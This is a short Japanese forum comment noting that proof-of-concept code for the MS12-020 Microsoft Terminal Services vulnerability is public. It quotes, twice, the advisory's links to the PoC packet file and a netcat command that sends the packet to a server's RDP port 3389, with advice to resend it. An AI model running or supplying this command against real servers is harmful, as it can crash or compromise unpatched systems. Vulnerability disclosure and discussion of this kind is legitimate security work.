> =========== > 3) The Code > =========== > http://aluigi.org/poc/termdd_1.dat [aluigi.org] > http://www.exploit-db.com/sploits/18606.dat [exploit-db.com] > nc SERVER 3389 < termdd_1.dat > resend it multiple times in case of no results and note that this is > just a simple proof-of-concept packet to quickly test the bug so it's > not optimized at all.
これですね実証コードが既に公開されている (スコア:3, 参考になる)
Microsoft Terminal Services Use After Free (MS12-020)
http://www.exploit-db.com/exploits/18606/ [exploit-db.com]
> ===========
> 3) The Code
> ===========
> http://aluigi.org/poc/termdd_1.dat [aluigi.org]
> http://www.exploit-db.com/sploits/18606.dat [exploit-db.com]
> nc SERVER 3389 < termdd_1.dat
> resend it multiple times in case of no results and note that this is
> just a simple proof-of-concept packet to quickly test the bug so it's
> not optimized at all.